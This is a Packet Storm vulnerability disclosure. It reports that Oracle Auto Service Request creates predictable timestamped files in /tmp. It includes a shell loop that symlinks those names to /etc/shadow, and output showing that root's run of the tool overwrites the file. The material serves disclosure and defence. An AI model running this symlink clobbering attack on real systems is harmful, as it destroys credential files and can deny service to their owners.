exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Auto Service Request File Clobber

Oracle Auto Service Request File Clobber
Posted Feb 5, 2013
Authored by Larry W. Cashdollar

Oracle Auto Service Request creates files insecurely in /tmp using time stamps instead of mkstemp(). Due to this, it is possible to clobber root owned files and possibly cause a denial of service condition or worse.

tags | exploit, denial of service, root
systems | solaris
SHA-256 | 3201569e185a30abb901fe01ff0684a58d22ab75b3d2eb41883373ead659d4e8

Oracle Auto Service Request File Clobber

Change Mirror Download
Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp().  You can clobber root owned files if you know when around the time the root administrator will be using this utility.



[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done


root executes the asr command:

[root@oracle-os-lab01 bin]# ./asr

register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.

version : show asr script version
exit
help : display a list of commands
? : display a list of commands


asr>

/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow

id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72

67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close